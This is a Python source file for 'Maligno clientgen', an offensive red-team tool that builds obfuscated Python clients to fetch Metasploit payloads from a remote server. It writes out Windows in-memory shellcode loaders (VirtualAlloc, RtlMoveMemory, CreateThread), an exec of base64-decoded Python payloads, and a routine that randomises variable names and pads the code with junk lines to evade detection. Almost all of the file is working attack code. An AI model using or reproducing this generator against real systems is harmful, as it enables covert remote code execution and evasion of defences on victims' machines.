#!/usr/bin/python

################################################################
#                                                              #
# Maligno clientgen                                            #
# written by Juan J. Guelfo @ Encripto AS                      #
# post@encripto.no                                             #
#                                                              #
# Copyright 2013-2015 Encripto AS. All rights reserved.        #
#                                                              #
# Maligno is licensed under the FreeBSD license.               #
# http://www.freebsd.org/copyright/freebsd-license.html        #
#                                                              #
################################################################


import os, getopt, sys, string, random, urllib, libs.malcfg, libs.malout
import xml.etree.ElementTree as ET


__version__ = "2.0"
__author__ = "Juan J. Guelfo, Encripto AS (post@encripto.no)"


def header():
    os.system("clear")

    print ""
    print " ================================================================= "
    print "|  Maligno clientgen v{0}: Maligno client generator \t\t  |".format(__version__)
    print "|  by {0}\t\t  |".format(__author__)
    print " ================================================================= "
    print ""


def help():
    header()
    print """
   Usage: python clientgen.py [mandatory args]

   Mandatory args:
       -f  file         ...Maligno server config file

   Example:
       python clientgen.py -f server_config.xml
    """
    sys.exit(0)


def get_client_template(template_file):
    try:
        fr = open(template_file, 'r')
        content = fr.read().splitlines()
        fr.close()

    except IOError:
        libs.malout.print_error("Could not find %s." % template_file)
        sys.exit()

    return content


def generate_client_code(server_config, profile_request_config, profile_response_config, profile_network_config, profile_client_config, profile_client_header_config, client_template, msfpayload):
    client_code = []
    for template_line in client_template:
        if template_line == "<CONFIG>":
            req_prefix = ""
            req_suffix = ""
            resp_prefix = ""
            resp_suffix = ""
            try:
                req_prefix = urllib.unquote(profile_request_config["prefix"])
            except KeyError:
                pass

            try:
                req_suffix = urllib.unquote(profile_request_config["suffix"])
            except KeyError:
                pass

            try:
                resp_prefix = urllib.unquote(profile_response_config["prefix"])
            except KeyError:
                pass

            try:
                resp_suffix = urllib.unquote(profile_response_config["suffix"])
            except KeyError:
                pass

            client_code.append("encoding = \"" + profile_network_config["encoding"] + "\"")
            client_code.append("encoding_rounds = " + profile_network_config["rounds"] + "")
            client_code.append("secret = \"" + profile_network_config["secret"] + "\"")
            client_code.append("http_method = \"" + profile_request_config["method"] + "\"")
            client_code.append("req_page = \"" + profile_request_config["page"] + "\"")
            client_code.append("req_param = \"" + profile_request_config["parameter"] + "\"")
            client_code.append("req_prefix = \"" + req_prefix + "\"")
            client_code.append("req_suffix = \"" + req_suffix + "\"")
            client_code.append("resp_prefix = \"" + resp_prefix + "\"")
            client_code.append("resp_suffix = \"" + resp_suffix + "\"")
            client_code.append("payload_id = " + str(msfpayload["id"]) + "")
            client_code.append("max_nap_time = " + profile_client_config["maxnaptime"] + "")
            client_code.append("server_addr = \"" + server_config["addr"] + "\"")
            client_code.append("server_port = \"" + server_config["port"] + "\"")
            client_code.append("get_caught = " + str(profile_network_config["getcaught"]) + "")
            client_code.append("req_delay = " + str(profile_network_config["reqdelay"]) + "")

            if profile_response_config["protocol"].upper() == "HTTP/1.0":
                client_code.append("http_10 = True")
            else:
                client_code.append("http_10 = False")

            if server_config["ssl"].upper() in ["TRUE"]:
                client_code.append("ssl = True")
            else:
                client_code.append("ssl = False")

            code_line = "http_headers = [ "
            if profile_client_header_config:
                    header_count = 1
                    for header in profile_client_header_config:
                        if header:
                            code_line += "{ \"field\":\"%s\", \"value\":\"%s\" }" % (str(header["field"]).rstrip().lstrip(), str(header["value"]).rstrip().lstrip())
                            header_count += 1

                        else:
                            print "\n[-] There was a problem while parsing one of the client headers. Ingnoring it...\n"

                        if header_count <= len(profile_client_header_config):
                            code_line += ", "

            code_line += " ]"
            client_code.append(code_line)

        elif template_line == "        <EXECUTION>":
            if msfpayload["payload"].find("python") > -1:
                code_line = "        exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]](shellcode)))"
            else:
                if msfpayload["perpetual"].upper() in ["TRUE"]:
                    code_line = """        shellcode = shellcode.decode("string_escape")
        shellcode = bytearray(shellcode)
        while(1):
            ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
            ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr), ctypes.c_int(len(shellcode)))
            bff = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
            ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), bff, ctypes.c_int(len(shellcode)))
            thread = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
            ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(thread),ctypes.c_int(-1))
            sleep(20)"""
                else:
                    code_line = """        shellcode = shellcode.decode("string_escape")
        shellcode = bytearray(shellcode)
        ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
        ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr), ctypes.c_int(len(shellcode)))
        bff = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
        ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), bff, ctypes.c_int(len(shellcode)))
        thread = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
        ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(thread),ctypes.c_int(-1))"""

            client_code.append(code_line)

        elif template_line.startswith("#"):
            continue

        else:
            client_code.append(template_line)

    return client_code


def generate_name(size=10, chars=string.ascii_uppercase +  string.ascii_lowercase):
    return ''.join(random.choice(chars) for _ in range(size))


def generate_extension():
    return random.choice(["aspx", "asp", "php", "html", "htm", "jsp", "nsf"])


def generate_encoding_type():
    return random.choice(["base64", "hex", "ascii", "plain"])


def obfuscate_client_code(client_code):

    table = {
            "encoding" : generate_name(random.randint(5,20)), "encoding_rounds" : generate_name(random.randint(5,20)),
            "secret" : generate_name(random.randint(5,20)), "req_page" : generate_name(random.randint(5,20)),
            "req_param" : generate_name(random.randint(5,20)), "req_prefix" : generate_name(random.randint(5,20)),
            "req_suffix" : generate_name(random.randint(5,20)), "req_path" : generate_name(random.randint(5,20)),
            "ctext" : generate_name(random.randint(5,20)), "resp_prefix" : generate_name(random.randint(5,20)),
            "resp_suffix" : generate_name(random.randint(5,20)), "http_10" : generate_name(random.randint(5,20)),
            "payload_id" : generate_name(random.randint(5,20)), "ssl" : generate_name(random.randint(5,20)),
            "server_addr" : generate_name(random.randint(5,20)), "server_port" : generate_name(random.randint(5,20)),
            "http_headers" : generate_name(random.randint(5,20)), "cipher" : generate_name(random.randint(5,20)),
            "header_index" : generate_name(random.randint(5,20)), "http_method" : generate_name(random.randint(5,20)),
            "plaintext" : generate_name(random.randint(5,20)), "padding_char" : generate_name(random.randint(5,20)),
            "http_conn" : generate_name(random.randint(5,20)), "http_resp" : generate_name(random.randint(5,20)),
            "shellcode" : generate_name(random.randint(5,20)), "unpack_data" : generate_name(random.randint(5,20)),
            "ptr" : generate_name(random.randint(5,20)), "bff" : generate_name(random.randint(5,20)),
            "thread" : generate_name(random.randint(5,20)), "__version__" : generate_name(random.randint(5,20)),
            "total" : generate_name(random.randint(5,20)), "iteration" : generate_name(random.randint(5,20)),
            "has_slept" : generate_name(random.randint(5,20)), "max_nap_time" : generate_name(random.randint(5,20)),
            "get_caught" : generate_name(random.randint(5,20)), "num_reqs" : generate_name(random.randint(5,20)),
            "req_delay" : generate_name(random.randint(5,20)), "nap_time" : generate_name(random.randint(5,20)),
            "proxy_enabled" : generate_name(random.randint(5,20)), "proxy_list" : generate_name(random.randint(5,20)),
            "proxy_addr" : generate_name(random.randint(5,20)), "proxy_port" : generate_name(random.randint(5,20)),
            "req_body" : generate_name(random.randint(5,20)), "content_length_present" : generate_name(random.randint(5,20))
            }

    obfuscated_code = []
    for x in xrange(0, random.randint(5,20)):
        obfuscated_code.append("%s = %s" % (generate_name(random.randint(5,20)), str(random.randint(5,20))))

    reached = False
    for line in client_code:
        if line.startswith("def"):
            reached = True

        if not reached:
            for x in xrange(0, random.randint(0,10)):
                n = random.randint(0, 10000000)
                if n % 11 == 8:
                    obfuscated_code.append("%s = \"%s\"" % (generate_name(random.randint(5,20)), str(random.choice(["GET", "POST", "HEAD"]))))

                elif n % 11 == 7:
                    obfuscated_code.append("%s = \"%s.%s\"" % (generate_name(random.randint(5,20)), generate_name(random.randint(5,10)).lower(),
                                                               generate_extension().lower()))
                elif n % 11 == 6:
                    obfuscated_code.append("%s = \"%s\"" % (generate_name(random.randint(5,20)), generate_name(random.randint(1, 10))))

                elif n % 11 == 5:
                    obfuscated_code.append("%s = \"%s\"" % (generate_name(random.randint(5,20)), str(generate_name(32, string.hexdigits).lower())))

                elif n % 11 == 4:
                    obfuscated_code.append("%s = %s" % (generate_name(random.randint(5,20)), str(random.randint(5,20))))

                elif n % 11 == 3:
                    obfuscated_code.append("%s = \"%s\"" % (generate_name(random.randint(5,20)), str(random.randint(0,1024))))

                elif n % 11 == 2:
                    obfuscated_code.append("%s = \"%s\"" % (generate_name(random.randint(5,20)), str(random.choice(["True", "False"]))))

                elif n % 11 == 1:
                    obfuscated_code.append("%s = \"%s\"" % (generate_name(random.randint(5,20)), generate_encoding_type().lower()))

                else:
                    obfuscated_code.append("%s = \"%s.%s.%s.%s\"" %
                    (generate_name(random.randint(5,20)), str(random.randrange(0, 255, 1)), str(random.randrange(0, 255, 1)), str(random.randrange(0, 255, 1)), str(random.randrange(0, 255, 1))))

        for key, value in table.iteritems():
            line = line.replace(key, value, 999)

        if len(line) > 0:
            obfuscated_code.append(line)

    return obfuscated_code


def generate_client_file(client_code, output_file):
    try:
        fw = open(output_file, 'w')
        fw.write("#!/usr/bin/python\n")

        for line in client_code:
            fw.write(line + "\n")

        fw.close()
        libs.malout.print_ok("Client file \"%s\" successfully written!\n" % output_file)

    except IOError:
        libs.malout.print_error("Could not save client code in %s.\n" %  output_file)

    return


if __name__ == '__main__':

    try:
        options, args = getopt.getopt(sys.argv[1:], "f:", ["file="])

    except getopt.GetoptError, err:
        header()
        libs.malout.print_error("ERROR: %s.\n" % str(err))
        sys.exit(1)

    if not options:
        help()

    config_file = None

    for opt, arg in options:
        if opt in ("-f"):
            config_file = arg

    if not config_file:
        header()
        libs.malout.print_error("ERROR: You must provide all mandatory arguments.\n")
        sys.exit(1)

    header()

    libs.malout.print_info("Reading server configuration file...")
    server_config = libs.malcfg.get_server_config(config_file)
    payload_config = libs.malcfg.get_payload_config(config_file)

    libs.malout.print_info("Reading profile...")
    profile_request_config = libs.malcfg.get_profile_request_config(server_config["profile"])
    profile_response_config = libs.malcfg.get_profile_response_config(server_config["profile"])
    profile_network_config = libs.malcfg.get_profile_network_config(server_config["profile"])
    profile_client_config = libs.malcfg.get_profile_client_config(server_config["profile"])
    profile_client_header_config = libs.malcfg.get_profile_client_header_config(server_config["profile"])

    output_folder = "./clients"
    if not os.path.exists(output_folder):
        os.makedirs(output_folder)

    index = 0
    for msfpayload in payload_config:
        index += 1
        print ""
        libs.malout.print_info("Generating client: %s of %s..." % (index, len(payload_config)))
        libs.malout.print_info("Reading client template...")
        client_template = get_client_template("maligno_client.template")

        libs.malout.print_info("Generating client code...")
        client_code = generate_client_code(server_config, profile_request_config, profile_response_config, profile_network_config, profile_client_config, profile_client_header_config, client_template, msfpayload)

        libs.malout.print_info("Obfuscating client code...")
        obfuscated_client_code = obfuscate_client_code(client_code)

        libs.malout.print_info("Writing client code to file...\n")
        generate_client_file(obfuscated_client_code, output_folder + "/" + msfpayload["id"] + "_" + server_config["profile"].split("/")[-1].split(".")[0] + "_" + msfpayload["payload"].split("/")[0] + "_" + msfpayload["payload"].split("/")[-1] + ".py")

    sys.exit()